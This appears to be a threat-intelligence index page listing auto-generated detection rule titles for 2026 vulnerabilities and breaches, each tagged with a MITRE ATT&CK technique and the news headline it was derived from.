🛡️ 1 more rules via /detect
CVE-2026-24505 - Dell PowerProtect Data Domain Remote Root Execution - Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Dell PowerProtect Data Domain: Remote Root Execution Vuln...
🛡️ 2 more rules via /detect
CVE-2026-24504 - Dell PowerProtect Root Command Execution via Input Validation
🌐 NVDT1059 — Execution
Auto-generated from Dell PowerProtect Vulnerability Allows Root Command Execu...
🛡️ 2 more rules via /detect
SGLang GGUF Command Injection RCE
Breach IntelT1059.001 — Execution
Auto-generated from Critical RCE in SGLang via Malicious GGUF Models
🛡️ 2 more rules via /detect
Italian Postal Service Data Breach - Unauthorized Data Processing
Breach IntelT1119 — Collection
Auto-generated from Italian Postal Service Slapped with $15M Fine for Data Pr...
🛡️ 2 more rules via /detect
Lovable Data Exposure via Unpatched Vulnerability
Breach IntelT1190 — Initial Access
Auto-generated from Lovable Exposes Sensitive User Data Due to Unpatched Vuln...
🛡️ 2 more rules via /detect
ConnectWise Automate Solution Center Unencrypted Traffic - CVE-2026-6066
🌐 NVDT1040 — Credential Access
Auto-generated from ConnectWise Automate Flaw Exposes Client Traffic to Inter...
🛡️ 1 more rules via /detect
CVE-2026-39918: Unauthenticated RCE via Vvveb Installer subdir Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Unauthenticated RCE in Vvveb Installer: Critical Flaw Exp...
🛡️ 2 more rules via /detect
Vvveb oEmbedProxy SSRF via file:// URL - CVE-2026-34428
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb SSRF Exposes Internal Networks and Files
🛡️ 2 more rules via /detect
Vvveb Admin Profile Privilege Escalation - CVE-2026-34427
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from Vvveb Privilege Escalation: RCE via Admin Profile Modific...
🛡️ 2 more rules via /detect
CVE-2026-26944 - Dell PowerProtect Root Command Execution via Missing Authentication
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Dell PowerProtect Vulnerability Allows Root Comm...
🛡️ 2 more rules via /detect
Vexa Meeting Bot Unauthenticated Transcript Access - CVE-2026-25058
🌐 NVDT1190 — Initial Access
Auto-generated from Vexa Meeting Bot Exposes Unauthenticated Transcripts
🛡️ 2 more rules via /detect
OpenAEV Password Reset Token Abuse - CVE-2026-24467
🌐 NVDT1190 — Initial Access
Auto-generated from OpenAEV Account Takeover: Critical Flaws in Password Reset
🛡️ 2 more rules via /detect
Dell PowerProtect Data Domain OS Command Injection - CVE-2026-23774
🌐 NVDT1190 — Initial Access
Auto-generated from Dell PowerProtect Data Domain Vulnerable to OS Command In...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4048
🌐 NVDT1190 — Initial Access
Auto-generated from Authenticated Command Injection in Progress ADC LoadMaster
🛡️ 2 more rules via /detect
CVE-2026-3519: Progress ADC OS Command Injection via aclcontrol
🌐 NVDT1190 — Initial Access
Auto-generated from Progress ADC RCE: Authenticated API Flaw Exposes LoadMaster
🛡️ 1 more rules via /detect
CVE-2026-3518: Progress ADC LoadMaster Unsanitized Input in 'killsession' API
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw in Progress ADC LoadMaster Appliances
🛡️ 2 more rules via /detect
CVE-2026-3517 - Progress ADC addcountry OS Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Progress ADC Products Face Critical OS Command Injection RCE
🛡️ 2 more rules via /detect
French Interior Ministry Data Breach - Potential PII Exfiltration
Breach IntelT1041 — Exfiltration
Auto-generated from French Identity Agency Hit by Cyberattack, Personal Data ...
🛡️ 2 more rules via /detect
CVE-2026-6635 - Rowboat Labs Tool Improper Authentication via X-Tools-JWE
🌐 NVDT1190 — Initial Access
Auto-generated from Rowboat Labs Tool Exposed by Improper Authentication Vuln...
🛡️ 1 more rules via /detect
POS Agent SIM Card Fraudulent Issuance
Breach IntelT1190 — Initial Access
Auto-generated from India Cracks Down on SIM Card Fraudsters Fueling Cybercrime
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — Attackers Disrupt Strong Authentication to Steal Credentials
🇮🇱 INCD IntelT1078.004 — Initial Access
Auto-generated from Attackers Disrupt Strong Authentication to Steal Credentials
🛡️ 1 more rules via /detect
CVE-2026-6632 Tenda Router SafeClientFilter Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Router Vulnerability Exposes Networks to Remote Exp...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6631
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Router Vulnerability Exposes Networks to Remote Exp...
🛡️ 2 more rules via /detect
CVE-2026-6630 Tenda Router HTTP Request Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Router Vulnerability: Remote Exploitable Buffer Ove...
CVE-2026-6629 MetaCRM sql.jsp SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Flaw in MetaCRM Exposes Systems to Remote A...
🛡️ 2 more rules via /detect
MCP Arbitrary Command Execution via MCP Protocol
Breach IntelT1190 — Initial Access
Auto-generated from MCP Design Flaw Opens Door to RCE, Threatening AI Supply ...
🛡️ 2 more rules via /detect
CVE-2026-6625 Mogu Blog SSRF via uploadPictureByUrl
🌐 NVDT1190 — Initial Access
Auto-generated from Mogu Blog Vulnerability: SSRF Allows Remote Server Takeover
🛡️ 2 more rules via /detect
CVE-2026-6621: Prototype Pollution in extend-deep via __proto__ manipulation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6621: Prototype Pollution in 1024bit extend-deep
🛡️ 1 more rules via /detect
CVE-2026-5967 - ThreatSonar Anti-Ransomware Command Injection
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical Privilege Escalation in ThreatSonar Anti-Ransomware
🛡️ 2 more rules via /detect
CVE-2026-39454: SKYSEA Client View Arbitrary File Write to Installation Directory
🌐 NVDT1574.001 — Privilege Escalation
Auto-generated from SKYSEA Client View: Local Privilege Escalation via Improp...
🛡️ 2 more rules via /detect
Fraud Campaign Impersonating Shufersal
Breach IntelT1566.002 — Initial Access
Auto-generated from Fraud Campaign Impersonates Major Israeli Brands
🛡️ 2 more rules via /detect
Microsoft Windows Server Update Service Corruption
Breach IntelT1190 — Initial Access
Auto-generated from Microsoft's Emergency Patch: Fixing Broken Windows Server...
🛡️ 2 more rules via /detect
Vercel Data Exfiltration Attempt via ShinyHunters
Breach IntelT1041 — Exfiltration
Auto-generated from Vercel Confirms Breach, Data Offered for $2 Million
🛡️ 2 more rules via /detect
CVE-2026-6615 - SuperAGI Multipart Upload Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Path Traversal in SuperAGI Exploitable Remotely
🛡️ 1 more rules via /detect
CVE-2026-5966 - TeamT5 Anti-Ransomware Arbitrary File Deletion via Path Traversal
🌐 NVDT1070.004 — Defense Evasion
Auto-generated from TeamT5 Anti-Ransomware Flaw: Path Traversal Exposes File ...
🛡️ 2 more rules via /detect
CVE-2026-5964 - Digiwin EasyFlow SQL Injection - Suspicious URI Query
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQL Injection in Digiwin EasyFlow .NET: Read, Mo...
🛡️ 2 more rules via /detect
CVE-2026-5963 - EasyFlow .NET SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQL Injection in EasyFlow .NET: Unauthenticated ...
🛡️ 2 more rules via /detect
Free Tier - KalepDao Heist - Suspicious Web Request Pattern
Breach IntelT1190 — Initial Access
Auto-generated from North Korea's KalepDao Heist: A Masterclass in Multi-Vect...
🛡️ 2 more rules via /detect
Galcomm Data Exfiltration - Web Server Access
Breach IntelT1190 — Initial Access
Auto-generated from Israeli Domain Registrar Galcomm Data Allegedly Leaked
🛡️ 2 more rules via /detect
CVE-2026-6606: SSRF via ModelScope AgentScope Audio Processing URL Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6606: SSRF in ModelScope AgentScope Audio Proces...
🛡️ 2 more rules via /detect
CVE-2026-6605 - ModelScope AgentScope SSRF via _get_bytes_from_web_url
🌐 NVDT1190 — Initial Access
Auto-generated from ModelScope AgentScope Hit by Critical SSRF Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-6604 - SSRF in ModelScope Agentscope URL Parsing
🌐 NVDT1190 — Initial Access
Auto-generated from Server-Side Request Forgery in ModelScope Agentscope
🛡️ 2 more rules via /detect
CVE-2026-6603: Remote Code Injection in ModelScope AgentScope execute_python_code
🌐 NVDT1059.001 — Execution
Auto-generated from CVE-2026-6603: Remote Code Injection in ModelScope AgentS...
🛡️ 2 more rules via /detect
CVE-2026-6602 - Unrestricted File Upload via ad_dpic parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Hospital Management System Hit by Remote Unrestricted Fil...
🛡️ 2 more rules via /detect
CVE-2026-32965 - Silex SD-330AC/AMC Manager Insecure Default Password Login Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Silex Tech Devices Vulnerable to Insecure Default Passwords
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32956
🌐 NVDT1190 — Initial Access
Auto-generated from CRITICAL: Silex Technology Devices Vulnerable to Remote C...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32955
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Buffer Overflow Hits Silex SD-330AC and AMC...
🛡️ 2 more rules via /detect
Vercel Breach - Context.ai Compromise via Google Workspace Hijack
Breach IntelT1190 — Initial Access
Auto-generated from Vercel Breach: Context.ai Compromise Exposes Customer Cre...
🛡️ 2 more rules via /detect
CVE-2026-6596 - Unrestricted File Upload in Langflow API
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Unrestricted File Upload in Langflow AI
🛡️ 2 more rules via /detect
CVE-2026-6595 - SQL Injection in buslocation.php
🌐 NVDT1190 — Initial Access
Auto-generated from Unpatched SQLi in School Management System Puts Student D...
🛡️ 2 more rules via /detect
CVE-2026-6594: brikcss merge Prototype Pollution via __proto__
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6594: brikcss merge Prototype Pollution Vulnerab...
🛡️ 2 more rules via /detect
CVE-2026-6582: Unauthenticated Access to Vector DB Details
🌐 NVDT1190 — Initial Access
Auto-generated from Unauthenticated Access in TransformerOptimus SuperAGI Vec...
🛡️ 1 more rules via /detect
H3C Magic B1 SetMobileAPInfoById Buffer Overflow Attempt - CVE-2026-6581
🌐 NVDT1190 — Initial Access
Auto-generated from H3C Magic B1 Routers Exposed: Critical Buffer Overflow Pu...
🛡️ 2 more rules via /detect
CVE-2026-6580: DjangoBlog Amap API Hardcoded Key Exposure
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6580: Hard-Coded Crypto Key in DjangoBlog
🛡️ 1 more rules via /detect
CVE-2026-6577 DjangoBlog Authentication Bypass via logtracks Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from DjangoBlog Faces High-Severity Authentication Bypass
🛡️ 1 more rules via /detect
Suspicious Bluetooth Device Activity on Military Network
Breach IntelT1190 — Initial Access
Auto-generated from Bluetooth Tracker in Greeting Card Exposes Dutch Warship ...
🛡️ 2 more rules via /detect
Vercel Data Exfiltration Attempt via Suspicious API Calls
Breach IntelT1041 — Exfiltration
Auto-generated from Vercel Confirms Breach, Stolen Data for Sale
🛡️ 2 more rules via /detect
ShinyHunters Vercel Data Exfiltration via Internal System Access
Breach IntelT1041 — Exfiltration
Auto-generated from Vercel Breach: ShinyHunters Claims Internal System Access...
🛡️ 2 more rules via /detect
Shufersal Phishing Survey Redirection
Breach IntelT1566.002 — Initial Access
Auto-generated from Shufersal Phishing Scam Targets Israeli Consumers
🛡️ 2 more rules via /detect
CVE-2026-6574: Hardcoded Credentials in osuuu LightPicture API
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6574: Hardcoded Credentials in osuuu LightPictur...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6569
🌐 NVDT1190 — Initial Access
Auto-generated from KodExplorer Vulnerability Exposes File Access to Unauthen...
🛡️ 3 more rules via /detect
CVE-2026-6568 - KodExplorer Path Traversal via share.class.php
🌐 NVDT1190 — Initial Access
Auto-generated from KodExplorer Path Traversal: Remote Exploitation Possible
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6563
🌐 NVDT1190 — Initial Access
Auto-generated from H3C Magic B1 Hit by Remotely Exploitable Buffer Overflow
🛡️ 2 more rules via /detect
CVE-2026-6562 - SQL Injection in muucmf Search Index
🌐 NVDT1190 — Initial Access
Auto-generated from Unpatched SQLi in dameng100 muucmf 1.9.5.20260309: Remote...
🛡️ 2 more rules via /detect
CVE-2026-6560 - H3C Magic B0 SSID Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from H3C Magic B0 Routers Vulnerable to Remote Buffer Overflow
🛡️ 1 more rules via /detect
KelpDAO $280M Heist - Anomalous Smart Contract Interaction
Breach IntelT1560 — Collection
Auto-generated from KelpDAO Suffers $280M Crypto Heist
🛡️ 2 more rules via /detect
Mirai Nexcorium Botnet Activity via Telnet Brute Force
Breach IntelT1110 — Credential Access
Auto-generated from Unmanaged Identities Fuel Cloud Breaches; DDoS Services D...
🛡️ 2 more rules via /detect
Grinex Exchange Hack - Suspicious Cryptocurrency Transaction Pattern
Breach IntelT1560 — Exfiltration
Auto-generated from Sanctioned Grinex Exchange Shuts Down After $13.74M Hack
🛡️ 2 more rules via /detect
Mirai Variant Command Injection via TBK DVR CVE-2024-3721
Breach IntelT1190 — Initial Access
Auto-generated from Mirai Botnet Variants Target TBK DVRs via CVE-2024-3721
🛡️ 2 more rules via /detect
WordPress CMP Plugin Arbitrary File Upload RCE - CVE-2026-6518
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin RCE: CMP Coming Soon & Maintenance Vulne...
🛡️ 2 more rules via /detect
SAIL TGA Heap Overflow - TGA Raw Packet Write - CVE-2026-40494
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Heap Overflow in SAIL TGA Codec (CVE-2026-40494)
🛡️ 2 more rules via /detect
SAIL Image Library Heap Overflow Exploit Attempt (CVE-2026-40493)
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Heap Overflow in SAIL Image Library (CVE-2026-40...
🛡️ 2 more rules via /detect
Exploit Attempt: SAIL XWD Pixel Format Memory Corruption (CVE-2026-40492)
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SAIL Library Bug: Memory Corruption Threat in Im...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40487
🌐 NVDT1190 — Initial Access
Auto-generated from Postiz AI Tool Vulnerability Allows Account Takeover via XSS
🛡️ 3 more rules via /detect
CVE-2026-35582 - Emissary Workflow Engine OS Command Injection via File Endings
🌐 NVDT1059.004 — Execution
Auto-generated from Emissary Workflow Engine Vulnerable to OS Command Injection
🛡️ 1 more rules via /detect
NovumOS Syscall 15 MemoryMapRange Abuse - CVE-2026-40572
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical NovumOS Flaw: Kernel Takeover via Memory Mapping
🛡️ 1 more rules via /detect
CVE-2026-40350 - Movary Unauthenticated Admin Account Creation
🌐 NVDT1136.003 — Privilege Escalation
Auto-generated from Movary Flaw Allows Admin Account Creation, High-Severity ...
🛡️ 2 more rules via /detect
NovumOS Syscall 12 JumpToUser Privilege Escalation - CVE-2026-40317
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical Flaw in NovumOS Allows Kernel Privilege Escalation
🛡️ 1 more rules via /detect
CVE-2026-35465 - SecureDrop Client RCE via Malicious Archive
🌐 NVDT1566.002 — Initial Access
Auto-generated from SecureDrop Client RCE: Server Compromise Leads to VM Take...
🛡️ 2 more rules via /detect
ChurchCRM Family Record Deletion via CSRF - CVE-2026-40581
🌐 NVDT1190 — Initial Access
Auto-generated from ChurchCRM Flaw: Data Deletion Via CSRF
🛡️ 2 more rules via /detect
CVE-2026-40484: ChurchCRM Backup Restore Webshell Upload
🌐 NVDT1190 — Initial Access
Auto-generated from ChurchCRM RCE: Unauthenticated Admin Exploit via Backup R...
🛡️ 2 more rules via /detect
Movary User Privilege Escalation via Settings Update - CVE-2026-40349
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from Movary Admin Escalation: A Simple Patch, A Critical Flaw
🛡️ 2 more rules via /detect
CVE-2026-40348 - Movary SSRF to Internal Network Probe
🌐 NVDT1190 — Initial Access
Auto-generated from Movary SSRF: Authenticated Users Can Probe Internal Networks
🛡️ 2 more rules via /detect
CVE-2026-40324 - Hot Chocolate GraphQL Server Stack Overflow DoS
🌐 NVDT1499 — Impact
Auto-generated from Critical Hot Chocolate GraphQL Server DoS Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-2262 - Easy Appointments WordPress Plugin Sensitive Data Exposure
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Exposes Sensitive Customer Data
🛡️ 2 more rules via /detect
CVE-2026-40478 - Thymeleaf SSTI Attempt via Expression Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Thymeleaf Vulnerability Bypasses Injection Prote...
🛡️ 2 more rules via /detect
CVE-2026-40477 - Thymeleaf SSTI Attempt via Expression Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Thymeleaf Vulnerability Bypasses Injection Prote...
🛡️ 2 more rules via /detect
CVE-2026-40474: wger GymConfig Update Auth Bypass
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from wger Fitness Manager: Auth Bypass Grants Global Config Co...
🛡️ 2 more rules via /detect
CVE-2026-40352 - FastGPT Password Change NoSQL Injection
🌐 NVDT1110.004 — Credential Access
Auto-generated from FastGPT NoSQL Injection: Account Takeover Risk
🛡️ 2 more rules via /detect
DNN CVE-2026-40321 SVG File Upload - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity XSS in DNN CMS Demands Immediate Patching
🛡️ 2 more rules via /detect
CVE-2026-40258 - Gramps Web API Path Traversal via Malicious ZIP Import
🌐 NVDT1021.002 — Lateral Movement
Auto-generated from Critical Path Traversal in Gramps Web API Puts Data at Risk
🛡️ 2 more rules via /detect
CVE-2026-40527 - Radare2 Command Injection via DWARF Parameters
🌐 NVDT1059.004 — Execution
Auto-generated from Radare2 Command Injection Flaw Exposes Analysis Workflow
🛡️ 2 more rules via /detect
CVE-2026-40303: zrok Heap Overflow via Malformed Cookie Count
🌐 NVDT1190 — Initial Access
Auto-generated from zrok Heap Overflow: Unauthenticated DoS Risk
🛡️ 2 more rules via /detect
CVE-2026-40286 - WeGIA Member Registration Stored XSS Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from WeGIA Web Manager: Stored XSS Puts Charitable Institution...
🛡️ 2 more rules via /detect
CVE-2026-40285: WeGIA SQL Injection via cpf_usuario POST parameter
🌐 NVDT1190 — Initial Access
Auto-generated from WeGIA SQLi: Authenticated Users Can Impersonate Others
🛡️ 1 more rules via /detect
HomeBox API Unauthorized Access via Default Group - CVE-2026-40196
🌐 NVDT1190 — Initial Access
Auto-generated from HomeBox API Flaw Bypasses Access Controls
🛡️ 2 more rules via /detect
CVE-2026-40461: Anviz CX2/CX7 Unauthenticated Debug Access Enablement
🌐 NVDT1190 — Initial Access
Auto-generated from Anviz CX2/CX7 Vulnerability: Unauthenticated Debug Access
🛡️ 1 more rules via /detect
Anviz CrossChex TCP Packet Injection - CVE-2026-40434
🌐 NVDT1071.004 — Lateral Movement
Auto-generated from Anviz CrossChex Vulnerability Allows Network Packet Injec...
🛡️ 2 more rules via /detect
CVE-2026-40342 - Firebird RCE via Path Traversal Plugin Load
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird Database Vulnerability Allows RCE via Path Trave...
🛡️ 2 more rules via /detect
Anviz CX2 Lite/CX7 Unverified Update Upload - CVE-2026-40066
🌐 NVDT1190 — Initial Access
Auto-generated from Anviz Devices Leak Remote Code Execution via Unverified U...
🛡️ 2 more rules via /detect
CVE-2026-35682 Anviz CX2 Lite Filename Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Anviz CX2 Lite Vulnerable to Root-Level Command Injection
🛡️ 2 more rules via /detect
Anviz CX2 Lite/CX7 Unauthenticated Firmware Upload - CVE-2026-35546
🌐 NVDT1190 — Initial Access
Auto-generated from Anviz Devices Exposed: Critical Firmware Upload Vulnerabi...
🛡️ 3 more rules via /detect
Firebird DB Division by Zero Crash Attempt - CVE-2026-35215
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird DB Division by Zero Vulnerability Crashes Servers
🛡️ 1 more rules via /detect
CVE-2026-34232 - Firebird Unauthenticated Server Crash via Crafted Packet
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird Vulnerability: Unauthenticated Crash via Crafted...
CVE-2026-32650 - Anviz CrossChex Standard TDS7 Plaintext Credentials
🌐 NVDT1190 — Initial Access
Auto-generated from Anviz CrossChex Standard: Plaintext Credentials Exposed v...
🛡️ 1 more rules via /detect
CVE-2026-32324 - Anviz CX7 MQTT Decryption Key Exposure
🌐 NVDT1583.001 — Reconnaissance
Auto-generated from Anviz CX7 Firmware Flaw Exposes Sensitive Device Communic...
🛡️ 1 more rules via /detect
Privilege Escalation via xrdp session execution error - CVE-2026-32107
🌐 NVDT1068 — Privilege Escalation
Auto-generated from xrdp Vulnerability Allows Local Privilege Escalation to Root
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40525
🌐 NVDT1190 — Initial Access
Auto-generated from Critical OpenViking Auth Bypass: Unset API Key Grants Ful...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33337
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird Database Vulnerability Exposes Systems to Remote...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-28224
🌐 NVDT1190 — Initial Access
Auto-generated from Unauthenticated Firebird Crash: Null Pointer Dereference ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-28212
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird Null Pointer Dereference: Unauthenticated Remote...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27890
🌐 NVDT1190 — Initial Access
Auto-generated from Firebird Vulnerability CVE-2026-27890: Unauthenticated Cr...
🛡️ 2 more rules via /detect
Ransomware Indicators — NHS Supply Chain
Breach Intelransomware — event-type
Auto-generated from NHS Ransomware Fallout Lingers 18 Months On
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5718
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin RCE: Drag and Drop File Upload Flaw
🛡️ 4 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5710
🌐 NVDT1190 — Initial Access
Auto-generated from Path Traversal in WordPress Plugin Exposes Files
🛡️ 2 more rules via /detect
Exploitation Attempt — CVE-2025-65104
🌐 NVDvulnerability — event-type
Auto-generated from Firebird Client Flaw Leaks Data with Newer Servers
Web Shell Activity Detection — CVE-2026-40518
🌐 NVDT1505.003 — Persistence
Auto-generated from ByteDance DeerFlow Path Traversal Allows Arbitrary File W...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40516
🌐 NVDT1190 — Initial Access
Auto-generated from OpenHarness SSRF Exposes Private Services, Cloud Metadata
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-3464
🌐 NVDT1190 — Initial Access
Auto-generated from WP Customer Area Plugin: Arbitrary File Read/Delete Expos...
🛡️ 2 more rules via /detect
Exploitation Attempt — CVE-2026-6284
🌐 NVDvulnerability — event-type
Auto-generated from Critical PLC Flaw Allows Network-Based Password Brute-Force
Web Application Exploitation Attempt — CVE-2026-6490
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Flaw in QueryMine SMS: Remote Exploitation ...
🛡️ 3 more rules via /detect
ShowDoc Vulnerability Exploitation Attempt
Breach IntelT1190 — Initial Access
Auto-generated from ShowDoc Exploit and Growing Satellite Security Concerns E...
🛡️ 2 more rules via /detect
CVE-2026-6483 Wavlink Router OS Command Injection via internet.cgi
🌐 NVDT1190 — Initial Access
Auto-generated from Wavlink Router OS Command Injection: Public Exploit Avail...
🛡️ 2 more rules via /detect
Malicious Ad Network Redirect to Malicious Site
Breach IntelT1537 — Defense Evasion
Auto-generated from Google Cracks Down on Malicious Ads, Tightens Android Pri...
🛡️ 2 more rules via /detect
Dell PowerProtect DD OS Certificate Login Privilege Escalation - CVE-2026-23776
🌐 NVDT1190 — Privilege Escalation
Auto-generated from Dell DD OS Vulnerability: Certificate Login Elevation of ...
🛡️ 2 more rules via /detect
CISA Alert: Active Exploitation of Apache ActiveMQ Vulnerability
Breach IntelT1190 — Initial Access
Auto-generated from CISA Warns: Active Exploitation of 13-Year-Old Apache Act...
🛡️ 2 more rules via /detect
Identity Fraud for North Korean IT Scheme Facilitators
Breach IntelT1134.004 — Defense Evasion
Auto-generated from North Korean IT Scheme Facilitators Jailed in US Court
🛡️ 2 more rules via /detect
CVE-2026-23778 Dell PowerProtect Command Injection
🌐 NVDT1203 — Execution
Auto-generated from Dell PowerProtect Zero-Day: Command Injection Flaw Expose...
🛡️ 2 more rules via /detect
CVE-2026-23775 Dell DD OS Log File Credential Exposure Attempt
🌐 NVDT1119 — Privilege Escalation
Auto-generated from Dell DD OS Log File Vulnerability Exposes Credentials
🛡️ 2 more rules via /detect
Dell PowerProtect BoostFS Credential Exposure - Free Tier
🌐 NVDT1552.001 — Credential Access
Auto-generated from Dell PowerProtect BoostFS Credential Exposure Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-33392 - JetBrains YouTrack Sandbox Bypass RCE
🌐 NVDT1190 — Initial Access
Auto-generated from JetBrains YouTrack RCE Flaw: High Privileges, Sandbox Bypass
🛡️ 2 more rules via /detect
Domain Controller Reboot Loop due to April Patch
Breach IntelT1499 — Impact
Auto-generated from Microsoft Servers Hit by April Patch Causing Domain Contr...
🛡️ 2 more rules via /detect
CVE-2026-6443 - Accordion and Accordion Slider Plugin Backdoor Activity
🌐 NVDT1190 — Initial Access
Auto-generated from Malicious Takeover of WordPress Plugin: CVE-2026-6443 Bac...
🛡️ 2 more rules via /detect
CVE-2026-4659 - Unlimited Elements for Elementor Arbitrary File Read via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Elementor Plugin Flaw Exposes WordPress to Arbitrary File...
🛡️ 2 more rules via /detect
NVD Enrichment Bypass - Unenriched CVE Exploitation Attempt
Breach IntelT1190 — Initial Access
Auto-generated from NIST NVD Overload: CVE Enrichment Limited After Massive S...
🛡️ 2 more rules via /detect
DDoS-for-Hire Domain Access - Free Tier
Breach IntelT1498 — Impact
Auto-generated from Law Enforcement Dismantles 53 DDoS-for-Hire Domains
🛡️ 2 more rules via /detect
Attempt to Load Malicious msimg32.dll in MobaXterm Directory - CVE-2026-6421
🌐 NVDT1218 — Privilege Escalation
Auto-generated from MobaXterm Vulnerability: Local Privilege Escalation Risk
🛡️ 2 more rules via /detect
CubeCart Admin Command Injection via `exec` function - CVE-2026-21719
🌐 NVDT1190 — Initial Access
Auto-generated from CubeCart Admin Command Injection: A High-Risk Vulnerabili...
🛡️ 2 more rules via /detect
Windows Privilege Escalation via Exploited Zero-Day Vulnerabilities
Breach IntelT1068 — Privilege Escalation
Auto-generated from Windows Zero-Days Under Active Exploitation: Escalating P...
🛡️ 2 more rules via /detect
CVE-2026-5807 - Unauthenticated Vault Root Token Generation/Rekey DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from Vault DoS: Unauthenticated Attackers Can Block Critical O...
🛡️ 1 more rules via /detect
Monitor Authentication from Breached Vendor — Amtrak
Breach Inteldata-breach — event-type
Auto-generated from Amtrak Data Breach: 2M Accounts Exposed by ShinyHunters
🛡️ 1 more rules via /detect
Vault Token Forwarding to Auth Backend - CVE-2026-4525
🌐 NVDT1552.004 — Credential Access
Auto-generated from Vault Token Forwarding Flaw Exposes Auth Backends
🛡️ 2 more rules via /detect
CVE-2026-3605: Authenticated User Deleting Secrets via Glob Policy
🌐 NVDT1531 — Impact
Auto-generated from Vault Vulnerability: Authenticated Users Can Trigger DoS ...
🛡️ 2 more rules via /detect
CVE-2026-5231: WP Statistics Stored XSS via utm_source Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress WP Statistics XSS: A Silent Admin Page Threat
🛡️ 2 more rules via /detect
CVE-2026-40262 - Note Mark XSS via Malicious File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Note Mark XSS: Magic Bytes Fail, Sessions Exposed
🛡️ 2 more rules via /detect
CVE-2026-22734: Cloud Foundry UAA Unsigned SAML Assertion Bypass
🌐 NVDT1133 — Persistence
Auto-generated from Cloud Foundry UAA Bypass: Unsigned SAML Exposes Identity ...
🛡️ 2 more rules via /detect
CVE-2026-40322: SiYuan Stored XSS to RCE via Malicious Mermaid Diagram
🌐 NVDT1566.002 — Initial Access
Auto-generated from Critical RCE in SiYuan PKM: XSS to Arbitrary Code Execution
🛡️ 2 more rules via /detect
CVE-2026-40318 - SiYuan Arbitrary File Deletion via Path Traversal
🌐 NVDT1071.001 — Impact
Auto-generated from SiYuan Path Traversal: Arbitrary File Deletion Exposes Co...
🛡️ 2 more rules via /detect
CVE-2026-40259: SiYuan RoleReader Unauthorized Attribute View Deletion
🌐 NVDT1204.002 — Impact
Auto-generated from SiYuan Vulnerability: Reader Role Can Wipe Attribute Views
🛡️ 2 more rules via /detect
CVE-2026-41113 Sagredo Qmail RCE via popen command injection
🌐 NVDT1190 — Initial Access
Auto-generated from Qmail RCE: A Legacy Mailer's Critical Flaw
🛡️ 2 more rules via /detect
CVE-2026-40170 - ngtcp2 Qlog Stack Overflow Attempt
🌐 NVDT1190 — Initial Access
